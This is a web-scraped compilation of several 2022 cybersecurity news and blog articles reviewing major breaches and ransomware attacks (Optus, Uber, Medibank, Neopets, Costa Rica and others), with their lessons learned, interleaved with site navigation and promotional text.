cyber attack case study 2022

Home / Resources / News and Trends / ISACA Now Blog / 2022 / Top Cyberattacks of 2022 Lessons Learned

Top cyberattacks of 2022: lessons learned.

For over a decade, I have analyzed the root causes, trends and patterns from what post-breach management specialists like to call unauthorized third parties performing really sophisticated cyberattacks. In the past, these cyberattacks were rarely “sophisticated” – and “ unauthorized third parties ” almost always meant cybercriminals .

2022 was different because infamy , that quality of becoming well-known for being cosmically bad at something, or an epic clown act, is no longer a prerequisite when it comes to having your digital landscape compromised. It is no longer *always* the organizations with lousy cybersecurity that are getting their data hacked.

In 2022, when it comes to large breaches, the unauthorized third parties are not necessarily the traditional organized gangs of cybercriminals from years gone by – they might be rogue nation-states or gifted (albeit misdirected) teenagers. Many of the cyberattacks are now looking far more sophisticated than in previous years.

The past year has been so full of breaches, not even the tech journalists can agree on what measurement to use to work out which of the hacks or breaches are the worst. Should it be monetary? Number of people impacted? Amount stolen? Remediation cost?

For those reasons, I am going to take what I think are the three largest data breaches (based on number of records stolen) and identify what key lessons we can take from them.

We start with the smallest of the three data breaches:

Optus (9 million) “Cyber Security. We won’t just do better. We’ll do best” declares the Optus cyberattack response page. A bold statement given that up to 9.8 million people could be impacted by the breach, which equates to approximately 40% of the entire population of the country it operates in, Australia.

Optus has not officially divulged the root cause, but various sources report that the intrusion leveraged an application programming interface (API) that could retrieve customer details without any authentication. Why? Because it was *thought* that the API would only ever be instantiated within secure network areas.

Allegedly – due to human error – a build engineer placed an instance of this API (with access to real data) in a test environment – and that test environment was accessible over the internet. Additionally, the records inside the database had insecure serialization – meaning the intruder could use example customer record IDs to predict the reference ID of other records.

If the information above proves to be correct, there were multiple, significant major and critical security control gaps at Optus (what I have always referred to as stacked risks ). As I have stated in the past, any enterprise taking a siloed approach and looking at individual risks can easily miss the potential magnitude of their overall exposure.

Optus has set aside ~$95m (A$140m) to cover the fallout from this data breach.

Lesson Learned from Optus Breach: Do not be tempted to let multiple known security risks sit unresolved because your organization *thinks* there is another layer of security in place. Why? *Because* that other layer of security will be taking the same approach.

As with every megabreach, intruders need to find multiple holes in the security of a digital landscape to do real damage and take substantial amounts of data.

Uber (57 million): This next example begins with an attack vector that is part of an intrusion trend. The hacker, in this case understood to be a teenager affiliated with Lapsus$, compromised the multi-factor authentication (MFA) by bombarding one person with authentication requests. Eventually, the authorized user accepted one of the bogus authentication requests, enabling the intruder to gain access to the company VPN (virtual private network).

(Side note: In a prior cyberattack earlier in the year, Lapsus$ had a 5% success rate in this type of MFA request-bombing attack vector, which was much higher than the 0.1% predicted by some marketing materials.)

Once inside the Uber VPN, the attacker was able to leverage several sub-optimal security configuration settings within the network and locate a PowerShell script that contained hard-coded privileged account management system (PAMS) credentials.

Once inside the PAMS, the intruder was able to access multiple tools and storage areas containing millions of Uber drivers and user records.

Lesson Learned from Uber Breach: Never rely on MFA alone to protect critical assets. Expect that hackers will compromise MFA on occasion and will target your highest value security assets (such as PAMS).

Take steps to mitigate the potential for compromise of these systems by, for example, minimizing any system accounts to the very least privilege they require, having automated monitoring alerts for any unusual behaviors and enforcing the highest standards of security best practice.

If you *must* place privileged access credentials in any system scripts, then compensating controls, such as surgically limiting permissions and automated monitoring, will be required.

Neopets (69 million) … Although I did state that an enterprise no longer needs to fail badly at cybersecurity, in my view, this breach seems to flatly fall into that category. Neopets managed to get its source code and 69 million user details stolen … without noticing until the cybercriminal offered to sell their database.

As Neopets put it in their statement :

As part of that same statement, Neopets stated that it “… is committed to safeguarding our players' personal information.” – which felt a little hollow – but at least the company committed to more extensively implementing MFA and strengthening security.

With the dwell-time (time from intrusion to discovery) of around 16 months, the intruders were able to take a leisurely stroll around the internal digital landscape for a long time without any fear of detection.

Lesson Learned from Neopets Breach: Underinvestment in cybersecurity continues to be a false economy. Breaches create brand damage, remediation work and potential regulatory fines that massively outweigh any initial cost-savings from underspending on security operations. When regulators look at organizations after a breach, the main question is: Can this enterprise demonstrate due diligence in how it invested in and operated its cybersecurity BEFORE the breach took place?

Average Isn’t Good Enough 2022 saw most organizations continuing to scale up their investments in cybersecurity as awareness grew that skimping on infosec was not a wise or viable way forward. Nonetheless, 2022 was still a cyberattack wasteland because the threats are still moving faster than the *average* enterprise.

Hackers (ethical or otherwise) can get in through the tiniest of gaps. If there are layers of security gaps, then intruders can also get back out with a lot of data.

Expect that it is the multiple unresolved gaps that can seem small on their own that hackers can stack together to form a bridge into and back out of your critical systems.

Expect intruders to try to target and re-purpose the tools and processes your enterprise uses to keep itself secure (such as multi-factor authentication and PAMS).

For me, the primary breach lesson from 2022 is this:

If your enterprise security wants to stay ahead – do not aim to be average – aim to be exceptional.

ISACA Now By Year

The biggest data breaches and leaks of 2022

The data breaches that had the biggest impact in the cyber security world over the past 12 months.

More than 4,100 publicly disclosed data breaches occurred in 2022 equating to approximately 22 billion records being exposed. Cyber security publication Security Magazine reported that the figures for 2022 are expected to exceed this figure by as much as five percent .

In this article, we reveal which data breaches and leaks and the phishing, malware and cyber attacks ranked among our top ten most-read cyber security news stories of 2022.

Read on to hear about data breaches at Revolut, Twitter, Uber and Rockstar, and let us know if you were impacted by any of the incidents covered in the comment section below.

10. Revolut data breach exposes information for more than 50,000 customers

The personal information for more than 50,000 users of fintech start-up Revolut was accessed during a data breach that took place on September 11, 2022. The breach involved a third-party gaining access to Revolut’s database and the personal information of 50,150 users.

The data accessed included names, home and email addresses, and partial payment card information, although Revolut has stated that card details were masked. The Lithuanian government said that Revolut had taken “prompt action to eliminate the attacker's access to the company's customer data and stop the incident” once it was discovered.

Learn more about public response to the breach in this September post.

9. SHEIN fined US$1.9mn over data breach affecting 39 million customers

In October, Zoetop Business Company, the firm that owns fast fashion brands SHEIN and ROMWE, was fined US$1.9mn by the state of New York after failing to disclose a data breach which affected 39 million customers.

The cyber security incident which took place in July 2018 saw a malicious third party gain unauthorized access to SHEIN’s payment systems. According to a statement issued by the state of New York’s Attorney General’s office, SHEIN’s payment processor contacted the brand and disclosed that it had been “contacted by a large credit card network and a credit card issuing bank, each of which had information indicating that [Zoetop’s] system[s] have been infiltrated and card data stolen”.

The discovery was made after the credit card network found SHEIN customers’ payment details for sale on a hacking forum.

Read more about SHEIN’s mishandling of the breach in this October post.

8. Student loan data breach leaks 2.5 million social security numbers

A data breach on student loan servicer Nelnet Servicing caused the confidential information of more than 2.5 million users to be leaked in June 2022.

It was concluded by the investigation on August 17, 2022, that due to a vulnerability in its system, student loan account registration information including names, home and email addresses, phone numbers and social security numbers, were accessible to an unknown third party from June until July 22, 2022.

Following this discovery, Nelnet Servicing notified the US Department of Education and law enforcement.

Learn more about the response to the data breach in this August post.

7. Twitter confirms data from 5.4 million accounts was stolen

In July 2022, a hacker that went by the alias ‘devil’ posted on hacking forum BreachForums that they had the data of 5.4 million Twitter accounts for sale.

The stolen data included email addresses and phone numbers from “celebrities, companies, randoms, OGs”. ‘OGs’ refers to Twitter handles that are either short, comprising of one or two letters, or a word that is desirable as a screen name, for example, a first name with no misspelling, numbers or punctuation. The hacker ’devil’ said they would not be accepting offers “lower than [$30,000]” for the database.

The data breach was the result of a vulnerability on Twitter that was discovered in January 2022.

Learn more about the vulnerability that led to the data breach here .

6. Hacker allegedly hits both Uber and Rockstar

Between September 15–19, 2022, a hacker allegedly hit both rideshare company Uber and video game company Rockstar.

On September 15, Uber’s internal servers were accessed following after a contractor’s device was infected with malware and their login details were sold on the dark web. The hacker accessed several other employee accounts, which then gave them access to a number of internal tools. The hacker then posted a message to a company-wide Slack channel and reconfigured Uber’s Open DNS to display a graphic image to employees on some internal sites.

The hack into Rockstar Games, developer of the Grand Theft Auto (GTA) game series, was discovered on September 19, 2022. A user called teapotuberhacker posted on Grand Theft Auto game series fan site GTAForums: “Here are 90 footage/clips from GTA 6. It’s possible I could leak more data soon, GTA 5 and 6 source code and assets, GTA 6 testing build.”

In the post’s comments, the hacker claimed they had “downloaded [the gameplay videos] from Slack” via hacking into channel used for communicating about the game.

Rockstar Games made a statement via Twitter that said the company had suffered a “network intrusion” which had allowed an unauthorized third party to "illegally access and download confidential information form [its] systems”, including the leaked GTA 6 footage.

Discover who orchestrated the hack and what happened to them in this September post.

5. 9.7 million peoples’ information stolen in Medibank data leak

On October 13, 2022, Australian healthcare and insurance provider Medibank detected some “unusual activity” on its internal systems. The company was then contacted on October 17 by the malicious party, who aimed to “negotiate with the [healthcare] company regarding their alleged removal of customer data”. However, Medibank publicly refused to bend to the hacker’s demands.

Medibank revealed the true extent of the hack on November 7, announcing that the malicious actor had gained unauthorized access to and stole the data for 9.7 million past and present customers. The information included confidential and personally identifying information on medical procedures including codes associated with diagnosis and procedures given.

Following Medibank’s continued refusal to pay a ransom, the hacker released files containing customer data called "good-list" and "naughty-list" on November 9, 2022.

The so-called “naughty-list” reportedly included details on those who had sought medical treatment for HIV, drug addiction or alcohol abuse or for mental health issues like eating disorders.

On November 10, they posted a file labelled “abortions” to a site backed by Russian ransomware group REvil, which apparently contained information on procedures that policyholders have claimed on, including miscarriages, terminations and ectopic pregnancies.

Find a full timeline of the Medibank data leak in this November post.

4. Hacker attempts to sell data of 500 million WhatsApp users on dark web

On November 16, 2022, a hacker posted a dataset to BreachForums containing what they claimed to be up-to-date personal information of 487 million WhatsApp users from 84 countries.

In the post, the alleged hacker said those who bought the datasets would receive “very recent mobile numbers” of WhatsApp users. According to the bad actor, among the 487 million records are the details for 32 million US users, 11 million UK users and six million German users.

The hacker did not explain how such a large amount of user data had been collected, saying only that they had “used their strategy” to obtain it.

Learn more about the data breach in this November post .

3. Personal and medical data for 11 million people accessed in Optus data breach

Australian telecommunication company Optus suffered a devastating data breach on September 22, 2022 that has led to the details of 11 million customers being accessed.

The information accessed included customers’ names, dates of birth, phone numbers, email and home addresses, driver’s license and/or passport numbers and Medicare ID numbers.

Files containing this confidential information were posted on a hacking forum after Optus refused to pay a ransom demanded by the hacker. Victims of the breach also said that they were contacted by the supposed hacker demanding they pay AU$2,000 (US$1,300) or their data would be sold to other malicious parties.

Find out more about how the Optus data breach occurred in this September post.

2. More than 1.2 million credit card numbers leaked on hacking forum

Carding marketplaces are dark web sites where users trade stolen credit card details for financial fraud, usually involving large sums of money. On October 12, 2022, carding marketplace BidenCash released the details of 1.2 million credit cards for free.

A file posted on the site contained the information on credit cards expiring between 2023 and 2026, in addition to other details needed to make online transactions.

BidenCash had previously leaked the details of thousands of credit cards in June 2022 as a way to promote the site. As the carding marketplace had been forced to launch new URLs three months later in September after suffering a series of DDoS attacks , some cyber security experts suggested this new release of details could be another attempt at advertising.

Discover how BidenCash gained access to 1.2 million credit card details in our October coverage.

1. Twitter accused of covering up data breach that affects millions

On November 23, 2022, Los Angeles-based cyber security expert Chad Loder tweeted a warning about a data breach at social media site Twitter that had allegedly affected “millions” across the US and EU. Loder claimed the data breach occurred “no earlier than 2021” and “has not been reported before”. Twitter had previously confirmed a data breach that affected millions of user accounts in July 2022, as seen in point seven of this article .

Loder stated, however, that this “cannot” be the same breach as the one they reported on unless the company “lied” about the July breach. According to Loder, the data from the November breach is “not the same data” as that seen in the July breach, as it is in a “completely different format” and has “different affected accounts”. Loder said they believed that the breach occurred due to malicious actors exploiting the same vulnerability as the hack reported in July.

Learn more about the data breach and those impacted in this November post .

To explore more most-read cyber security news articles from Cyber Security Hub, click here to discover the top 10 cyber security threats and attacks of 2022 .

Which data breach had the biggest impact on you let us know in the comments. , upcoming events, anti-financial crime exchange europe 2024.

September 19-20 Frankfurt, Germany

OT Cybersecurity Summit

October 28 - 29, 2024 Norris Conference Center, Houston CityCentre, TX

Automotive Cyber Security Europe 2024 | Automotive IQ

11 - 14 November 2024 The Westin Grand Frankfurt, Germany

Anti-Financial Crime Exchange UK

March 17 - 18, 2025 London, UK

Digital Identity Week

09 - 10 September, 2025 Sydney, Australia

Subscribe to our Free Newsletter

Insights from the world’s foremost thought leaders delivered to your inbox.

Latest Webinars

Preventing financial and reputational risk with process intelligence.

2024-05-23 11:00 AM - 12:00 PM EDT

Building high-performing development teams: Harnessing tools, processes & AI

2024-05-02 11:00 AM - 12:00 PM EDT

Building cyber resilience

2024-04-24 11:30 AM - 12:30 PM SGT

FIND CONTENT BY TYPE

Case Studies
White Papers

Cyber Security Hub COMMUNITY

Advertise with us
Cookie Policy
User Agreement
Become a Contributor
All Access from CS Hub
Become a Member Today
Media Partners

ADVERTISE WITH US

Reach Cyber Security professionals through cost-effective marketing opportunities to deliver your message, position yourself as a thought leader, and introduce new products, techniques and strategies to the market.

JOIN THE Cyber Security Hub COMMUNITY

Join CSHUB today and interact with a vibrant network of professionals, keeping up to date with the industry by accessing our wealth of articles, videos, live conferences and more.

Cyber Security Hub, a division of IQPC

Careers With IQPC | Contact Us | About Us | Cookie Policy

Become a Member today!

PLEASE ENTER YOUR EMAIL TO JOIN FOR FREE

Already an IQPC Community Member? Sign in Here or Forgot Password Sign up now and get FREE access to our extensive library of reports, infographics, whitepapers, webinars and online events from the world’s foremost thought leaders.

We respect your privacy, by clicking 'Subscribe' you will receive our e-newsletter, including information on Podcasts, Webinars, event discounts, online learning opportunities and agree to our User Agreement. You have the right to object. For further information on how we process and monitor your personal data click here . You can unsubscribe at any time.

Share full article

Supported by

Uber Investigating Breach of Its Computer Systems

The company said on Thursday that it was looking into the scope of the apparent hack.

By Kate Conger and Kevin Roose

Uber discovered its computer network had been breached on Thursday, leading the company to take several of its internal communications and engineering systems offline as it investigated the extent of the hack.

The breach appeared to have compromised many of Uber’s internal systems, and a person claiming responsibility for the hack sent images of email, cloud storage and code repositories to cybersecurity researchers and The New York Times.

“They pretty much have full access to Uber,” said Sam Curry, a security engineer at Yuga Labs who corresponded with the person who claimed to be responsible for the breach. “This is a total compromise, from what it looks like.”

An Uber spokesman said the company was investigating the breach and contacting law enforcement officials.

Uber employees were instructed not to use the company’s internal messaging service, Slack, and found that other internal systems were inaccessible, said two employees, who were not authorized to speak publicly.

Shortly before the Slack system was taken offline on Thursday afternoon, Uber employees received a message that read, “I announce I am a hacker and Uber has suffered a data breach.” The message went on to list several internal databases that the hacker claimed had been compromised.

We are having trouble retrieving the article content.

Please enable JavaScript in your browser settings.

Thank you for your patience while we verify access. If you are in Reader mode please exit and log into your Times account, or subscribe for all of The Times.

Thank you for your patience while we verify access.

Already a subscriber? Log in .

Want all of The Times? Subscribe .

Hackers and cybercrime prevention

Getty Images

1. Umbrella company Brookson self-refers to NCSC following cyber attack on its network

In January, contractor payroll service provider Brookson Group referred itself to the National Cyber Security Centre (NCSC) after an “extremely aggressive” cyber attack that forced it to take systems offline . Coming amid the ongoing IR35 controversy, this incident, and a separate attack on a different umbrella firm, disrupted salary payments for thousands.

2. Cyber attacks on European oil facilities spreading

In February, a series of cyber attacks targeting oil distribution terminals and other facilities in Europe had authorities on high alert, given rising fuel prices and the threat of supply disruption as the political crisis in Ukraine escalated into conflict.

3. How Lapsus$ exploited the failings of multifactor authentication

A series of attacks on technology suppliers by a group known as Lapsus$ grabbed the headlines early in 2022, and although some gang members were arrested, these attacks have continued later into the year. In March, we explored how Lapsus$ attacks on Nvidia and Okta highlighted weak multifactor authentication and the risks of employees being bribed or falling victim to social engineering.

4. Crisp supply shortage looms after KP Snacks hit by ransomware

Every so often, a cyber attack hits the front pages of the UK’s tabloid newspapers, and February’s Conti ransomware attack on the systems of KP Snacks , the company behind iconic brands such as Hula Hoops, Space Raiders and the eponymous peanuts, made the cut. Computer Weekly heard from security experts about the incident, one of whom spoke of a “dark day for crisp aficionados”.

5. Did the Conti ransomware crew orchestrate its own demise?

Conti hit the headlines again in May, when it shut down amid suggestions it had orchestrated its own downfall for its members to split off into new operations . Ransomware cartels come and go, but Conti was a particularly dangerous group, and its loss was not mourned.

6. Uber suffers major cyber attack

Ride-sharing service Uber was one of 2022’s high-profile cyber attack victims in September, when it suffered a supposed social engineering attack on an employee by an apparent teenage hacktivist who wanted the company to pay its drivers more money . The incident saw multiple systems at Uber disrupted, which later blamed the Lapsus$ collective.

7. South Staffs Water customer data leaked after ransomware attack

A somewhat botched Clop/Cl0p ransomware attack on South Staffordshire Water in August seemed to have been largely forgotten, until it emerged at the end of November that the gang had stolen customer data and leaked it on the dark web . The data included names and addresses, bank details including sort codes and account numbers, and possibly other personal data. Customers of sister company Cambridge Water also seem to have been hit.

8. TalkTalk hacker Daniel Kelley gives up his black hat for good

The Lapsus$ cyber crime spree put teenage hackers and so-called script kiddies, rather than advanced ransomware gangs, in the spotlight this year, and in June, Computer Weekly spoke to one of the UK’s most famous teenage hackers, Daniel Kelley, who was just 17 when he played a key role in the infamous TalkTalk cyber attack . Kelley is still laser-focused on cyber security, but is planning to pursue a legitimate career.

9. UK police arrest 120 in largest-ever cyber fraud crackdown

Ransomware gangs rarely directly target consumers, making digitally enabled fraud arguably the most likely way the average person is going to fall victim to cyber crime. The fight against fraud continued in 2022, and in November, the Metropolitan Police revealed details of its role in a major operation that took down a cyber criminal website and saw more than 100 arrests.

10. Rackspace email outage confirmed as ransomware attack

At the beginning of December, a sudden drop in service for users of Rackspace’s Hosted Exchange business caused widespread chaos before being confirmed as a ransomware attack by an unspecified group . Full details of the incident are not yet known, but given how many Computer Weekly readers tuned in, it will likely prove one of the more disruptive cyber crime incidents of the year.

The 10 biggest ransomware attacks in history

AdvIntel: Conti rebranding as several new ransomware groups

Did the Conti ransomware crew orchestrate its own demise?

US offers $10M bounty for Conti ransomware information

While California advances AI legislation targeting safety testing, the U.S. Senate will also have on its plate several AI bills ...

The next U.S. president will set the tone on tech issues such as AI regulation, data privacy and climate tech. This guide breaks ...

CIOs and IT leaders can play an important role in boosting tech talent retention. Learn how these strategies can motivate ...

The Office of the National Cyber Director has published a roadmap for internet routing security that outlines recommendations for...

AI threat modeling can help enterprise security teams identify weaknesses in their AI systems and apps -- and keep bad actors ...

North Korean state-sponsored threat actors have been conducting successful social engineering campaigns against cryptocurrency ...

Test scripts are the heart of any job in pyATS. Best practices for test scripts include proper structure, API integration and the...

Cloud and on-premises subnets use IP ranges, subnet masks or prefixes, and security policies. But cloud subnets are simpler to ...

Satellite connectivity lets Broadcom offer the VeloCloud SD-WAN as an option for linking IoT devices to the global network from ...

Rocky Linux and AlmaLinux are new distributions created after Red Hat announced the discontinuation of CentOS. These ...

The Broadcom CEO says public cloud migration trauma can be cured by private cloud services like those from VMware, but VMware ...

New capabilities for VMware VCF can import and manage existing VMware services through a single console interface for a private ...

Microsoft Copilot raises security concerns around unauthorized or unintentional data access. Prevent leaks with vigilant ...

Don't wait until you have a metadata management problem to address the issue. Put a metadata management framework in place to ...

The time series database specialist's update addresses performance to better handle complex real-time workloads and includes a ...

2022 has shaped up to be a pricey year for victims of cyberattacks.

Cyberattacks continue to target critical infrastructures such as health systems, small government agencies and educational institutions. Ransomware remains a popular attack method for large and small targets alike. While organizations may choose not to disclose the costs associated with a cyberattack, the loss of consumer trust will always be a risk after any significant attack.

Let’s look at the 13 costliest cyberattacks of the past year and the trends that defined major threats from now to the beginning of 2022.

1. November 2022: Government of Costa Rica

The government of Costa Rica recently declared a state of emergency after enduring weeks of ransomware attacks on its critical systems. As a result, the government could not pay its workers on time and asked them to apply for payment through email or paper-based methods. The attack also disrupted tax and customs systems, causing the country’s import/export logistics to collapse. The Conti ransomware gang demanded a $20 million ransom payment, claiming the attacks were done to overthrow the government. The criminal gang published an estimated 50% of the data stolen during the weeks-long attack. The Costa Rican government has not paid the ransom.

2. October 2022: Medibank

A costly attack on health insurer Medibank affected all of its 3.9 million current and former customers . Attackers demanded a ransom payment of $9.7 million not to publish the stolen data, which Medibank refused to pay . The criminal gang then threatened to release data each day the ransom remained unpaid. Even before customer compensation and regulatory and legal costs were paid, the attack was estimated to cost Medibank $25 to $35 million . In addition, Medibank delayed insurance premium increases until January 2023, which will cost the company another $62 million.

3. October 2022: CommonSpirit Health System

A ransomware attack on CommonSpirit Health System affected patients across the country. As one of the largest U.S. hospital operators, the system operates 140 hospitals and 2,000 patient care sites. Electronic health records were unavailable while the hospital’s system was offline. The attack directly affected patient care when some patients received the wrong dosages and others had to delay important surgeries, including at least one cancer surgery. An estimated 20 million patients were affected by this attack.

4. September 2022: Uber

The attack on Uber this year showcased the dangers presented by social engineering. Threat actors broke through the company’s defense by sending a fake two-factor authentication notification urging the victim to click a link to verify a request. After compromising the employee account, the attackers used the company’s virtual private network to access internal network resources. They gained access to the company’s privilege access management service, used it to escalate account privileges and claimed to have access to several Uber systems, including AWS, Duo, GSuite, OneLogin, Slack, VMware and Windows.

5. September 2022: Rockstar Games

After gaining access to the company’s internal systems, an attacker downloaded the complete source code for Grand Theft Auto 5 and 6 and other confidential information in an attack on Rockstar Games. This breach occurred by targeting collaboration tools used by developers, such as Slack and Confluence Wiki. The attackers appeared to be more interested in extortion than publishing the stolen data.

6. May 2022: AcidRain Wiper Malware

Widespread wiper malware attacks have wracked Ukraine since its war with Russia began. The AcidRain malware uses brute-force attacks to find device file names and then wipes every file it can find. The attacks have knocked tens of thousands of modems offline since they began in early 2022.

7. April 2022: U.K. National Health Service (NHS)

The NHS provides infrastructure for tens of thousands of health organizations. Over a period of six months, an attack compromised over 100 NHS employee accounts and used them to send phishing emails. Some phishing campaigns attempted to steal Microsoft credentials . These phishing emails were primarily fake document download alerts, complete with an NHS disclaimer at the end of each message. Though the NHS migrated to Office 365, that didn’t entirely end the fraudulent messages, which continued in much smaller numbers.

8. April 2022: Austin Peay State University

A ransomware attack on Austin Peay State University brought the university to a halt just before final exams began. The university urged faculty, staff and students to disconnect university computers from the network and avoid using any university devices on campus or at home. Only personal devices such as laptops and cell phones could continue to access email and other university resources. The university canceled final exams and closed all computer labs.

9. April 2022: Florida International University

A ransomware gang attacked Florida International University just weeks after the attack on North Carolina Agricultural and Technical State University (A&T). The same group, ALPHV/BlackCat, claimed responsibility for both. Attackers exfiltrated 1.2 terabytes of sensitive data , including social security numbers, accounting documents and email databases. At the time of the incident, the university announced there was no evidence that the attack had compromised information. However, security researchers examined stolen data and verified it was real.

10. March 2022: North Carolina A&T

North Carolina Agricultural and Technical State University became a ransomware victim during spring break. The attack targeted multiple systems, including Blackboard, Banner ERP, Qualtrics, VPN, Jabber and Chrome River. Extended outages meant students could not submit assignments, and classes were canceled . The ransomware gang responsible for the attack claimed it stole the personal data of faculty, staff and students, as well as contracts, financial data and multiple databases.

11. February 2022: Nvidia

Earlier this year, microchip maker Nvidia suffered an attack during which one terabyte of data was stolen , including usernames and cryptographic hashes for more than 70,000 Nvidia employees. The Lapsus$ ransomware gang claimed responsibility for the hack. The criminal gang first demanded the removal of a feature that makes Nvidia graphic cards less desirable for crypto mining, then later modified the demand for open-source graphics drivers for all future cards. The gang threatened to release the stolen data if Nvidia did not meet their demands.

12. January 2022: Red Cross

Attackers targeted a Red Cross family reunification program through an unpatched vulnerability in the organization’s enterprise password management platform. The targeted reunification program reconnects families separated by migration, war and disaster. State-sponsored threat actors were likely responsible since the attack was tailored specifically for Red Cross systems. Attackers remained in the system for more than 70 days with access to personally identifiable information, including location, of more than 515,000 people in the program.

13. January 2022: Twitter

At the beginning of 2022, an attacker used a zero-day vulnerability to gain access and siphon the usernames, phone numbers and email addresses of nearly 6 million Twitter users . Stolen user data was likely combined with other information scraped from the web to build a database later offered for sale on a hacker forum.

Above all, these attacks illustrate the importance of continuous vigilance against cyberattacks. Clearly, ransomware and high-profile attacks have proved especially insidious. Whatever 2023 brings, we must be ready to face it with the right strategies and resources. IBM’s Security Framing and Discovery Workshop is a great no-cost option to improve your organization’s cybersecurity posture in time to meet the next threat.

If you are experiencing cybersecurity issues or an incident, contact X-Force to help: U.S. hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034 .

More from Intelligence & Analytics

New report shows ongoing gender pay gap in cybersecurity.

3 min read - The gender gap in cybersecurity isn’t a new issue. The lack of women in cybersecurity and IT has been making headlines for years — even decades. While progress has been made, there is still significant work to do, especially regarding salary.The recent ISC2 Cybersecurity Workforce Study highlighted numerous cybersecurity issues regarding women in the field. In fact, only 17% of the 14,865 respondents to the survey were women.Pay gap between men and womenOne of the most concerning disparities revealed by…

Protecting your data and environment from unknown external risks

3 min read - Cybersecurity professionals always keep their eye out for trends and patterns to stay one step ahead of cyber criminals. The IBM X-Force does the same when working with customers. Over the past few years, clients have often asked the team about threats outside their internal environment, such as data leakage, brand impersonation, stolen credentials and phishing sites. To help customers overcome these often unknown and unexpected risks that are often outside of their control, the team created Cyber Exposure Insights…

X-Force Threat Intelligence Index 2024 reveals stolen credentials as top risk, with AI attacks on the horizon

4 min read - Every year, IBM X-Force analysts assess the data collected across all our security disciplines to create the IBM X-Force Threat Intelligence Index, our annual report that plots changes in the cyber threat landscape to reveal trends and help clients proactively put security measures in place. Among the many noteworthy findings in the 2024 edition of the X-Force report, three major trends stand out that we’re advising security professionals and CISOs to observe: A sharp increase in abuse of valid accounts…

Topic updates

Analysis and insights from hundreds of the brightest minds in the cybersecurity industry to help you prove compliance, grow business and stop threats.

Move fast, think slow: How financial services can strike a balance with GenAI

Take on Tomorrow @ the World Economic Forum in Davos: Energy demand

Perspectives from the Global Entertainment & Media Outlook 2024–2028

Climate risk, resilience and adaptation

Business transformation

Sustainability assurance

The Leadership Agenda

Global Workforce Hopes and Fears Survey 2024

S+b digital issue: Generative AI: The 21st-century power play

The New Equation

PwC’s Global Annual Review

Committing to Net Zero

The Solvers Challenge

Loading Results

No Match Found

Cyber Threats 2022: A Year in Retrospect

“Blindsided” is cybersecurity’s worst-case scenario. The threat you don’t know about; the attack you don’t see coming; the hacker hiding undetected in your networks: unknowns are what can take a company down. Exposing them is what threat intelligence lives to do.

Companies in 2022 faced an array of threat actors: sophisticated advanced persistent threats, or APTs; ruthless cyber criminals; disgruntled insiders; a resurgence in hacktivism and distributed denial of service (DDoS) attacks, and more. Geopolitics dominated the headlines and the cybersphere, even as threat actors continually shifted tactics and techniques and shared their tools, motivated by sabotage, espionage and money.

And in 2022, public and private sectors joining forces and sharing their intelligence bolstered organisations’ defences.

Our report “Cyber Threats 2022: A Year in Retrospect” examines the threat actors, trends, tools and motivations that captured the cyber threat landscape last year. It includes incident response case studies with direct and detailed insight into tools, techniques and procedures (TTPs) used in intrusions. We also provide detection logic throughout the report to assist your defenders when scanning your own systems and networks, to help you find malicious threat actors.

With context for what to expect in 2023 from the report, we strive, as always, to not only keep pace with hostile cyber activity, but to get ahead of it, and stay ahead.

Vulnerability and threat actor agility

Geopolitical issues and the threat landscape, evolving cyber crime.

The Log4Shell vulnerability in Apache’s Log4j Java logging framework is thought to have affected 93% of business cloud environments and hundreds of millions of machines. A range of cyber threats jumped on the opportunity to exploit this vulnerability as organisations worked to identify impacted instances in their environments.
Threat actors ranging in motivation and sophistication made use of commoditised and shared tooling and frameworks to accelerate and optimise their operations. Attackers also engaged in fast-moving, brute force attempts to fatigue users and security measures through social engineering or multifactor authentication (MFA) bypassing.
Some threat actors developed better ways of obfuscating their espionage operations and intellectual property theft, making it increasingly difficult to identify who they were and what they were stealing. The use of obfuscation-as-a-service proxies became the method of choice for these threat actors to hide their tracks as they compromised victims and exfiltrated confidential and sensitive information.

Looking ahead:

Attackers will continue scouring unpatched systems for Log4Shell and other vulnerabilities and will exploit where they can. Software library vulnerabilities are also likely to be an exploitation focus for threat actors in the year ahead.

Poor or inconsistent patching regimes continue to be a key factor behind successful intrusions into networks. Most successful attacks exploit vulnerabilities that have already been remediated by manufacturers or developers and are available to customers for implementation. Successful attacks that are the result of 0-day exploits are still comparatively rare. Attackers will do the minimum they need to in order to gain access to a network and will not burn higher-end capabilities unnecessarily.

We therefore recommend that organisations prioritise defence in depth and rigorous patching in their security strategies to raise the barrier to entry for attackers.

Espionage and sabotage motivated threat actors used their offensive cyber capabilities to complement traditional warfare approaches. They used these against countries and private entities seen to be supporting their perceived enemies. They sought to gain strategic advantage by weakening digital and physical infrastructure.
Threat actors continued to engage in the contest for economic supremacy through intellectual property theft, with cyber attacks exacerbating ongoing supply chain issues and financial challenges. Threat actors used procured infrastructure, as well as compromised assets, to infiltrate and interdict supply chains, as well as to undermine secure communications around the world. Targets included high-end technology firms and telecommunications, manufacturing and logistics sectors.

Security and law enforcement agencies, along with the commercial security industry, will continue to use public disclosures to counter the activities of APTs and thwart their operations. Cloud service, managed service and identity and access management (IAM) providers with privileged access to client networks will increasingly become targets of choice for the most sophisticated actors – to achieve the scaled access they need to compromise the targets of their espionage and intellectual property theft operations.

In the full Cyber Threats 2022: A Year in Retrospect report, learn about these significant events and trends in more detail.

Ransomware continued to be a major threat to industries around the world, as threat actors were able to circumvent security measures and successfully infect networks, from manufacturing to retail and beyond, and extort high ransoms from their victims. Governments and private companies responded to cyber threats with sanctions and blacklisting, which shut down the operations of at least one major ransomware group. Due to the fractured and fluid nature of ransomware groups, many cyber criminals simply moved to deploy their skills and capabilities in other, lesser-known brands and operations.
Credential stealing malware proliferated within the cyber criminal ecosystem and bolstered the demand for Access-as-a-Service (AaaS) and other commoditised cyber criminal offerings, which powered cyber-enabled fraud and opportunistic attacks spanning multiple industries and countries.

Governments will also explore the continued use of sanctions as a way of hamstringing ransomware and other threat actors, as well as their access to and use of extorted and stolen funds. Organisations will increasingly be required to build their defence efforts and security strategies to account for more frequent attacks powered by an increasingly commodotised -as-a-Service cyber criminal ecosystem.

Sectors

Threat actors vary in motivation and sophistication, tailoring operations and opportunistic attacks in different sectors. In 2022, attacks in one sector cascaded to other industries and inflicted greater damage. That’s due to increased interconnections among increasingly digitised supply chains and industries.

Click on a sector to learn sector-specific motivations summarized by PwC Threat Intelligence from 2022 case studies and in-house analytics.

Aerospace and Defence

Construction, financial services, manufacturing, pharmaceuticals and life sciences, professional services, sports and entertainment, telecommunications.

Transport and Logistics

Motivations: Espionage, cyber crime, sabotage, hacktivism

